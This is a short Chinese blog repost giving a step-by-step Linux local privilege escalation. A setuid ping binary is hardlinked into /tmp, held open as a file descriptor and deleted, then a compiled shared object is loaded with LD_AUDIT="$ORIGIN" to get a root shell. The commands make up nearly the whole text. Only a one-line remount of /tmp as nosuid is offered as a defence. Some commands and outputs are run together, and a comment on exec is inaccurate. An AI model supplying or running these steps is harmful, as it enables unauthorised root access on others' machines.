普通用户tmp目录下越root权限

 以一个普通用户登录

系统：

用户：joker

内核：

#id

$ ls -ld /tmp/          #查看tmp目录权限1777

$ cd /tmp/            #进入tmp目录

[tmp]$ mkdir exploit     #建立一个exploit目录

[tmp]$ ln /bin/ping /tmp/exploit/target     #对exploit做链接

 

[tmp]$ exec 3< /tmp/exploit/target         #将exploit/target装入exec:装入并运行其它程序的函数

[tmp]$ ls -l /proc/$$/fd/3

[tmp]$ rm -fr /tmp/exploit/     #删除exploit目录

[tmp]$ ls -l /proc/$$/fd/3

[tmp]$ cat > payload.c

[tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[tmp]$ ls -l /tmp/exploit 

[tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

[tmp]# whoami root

目录一般不开777权限目录的.   如果要则对777的目录做如下操作,可以控制你提权的.

比如/tmp# mount -o bind /tmp /tmp# mount -o remount,bind,nosuid /tmp /tmp

转载于:https://blog.51cto.com/jokervip/536898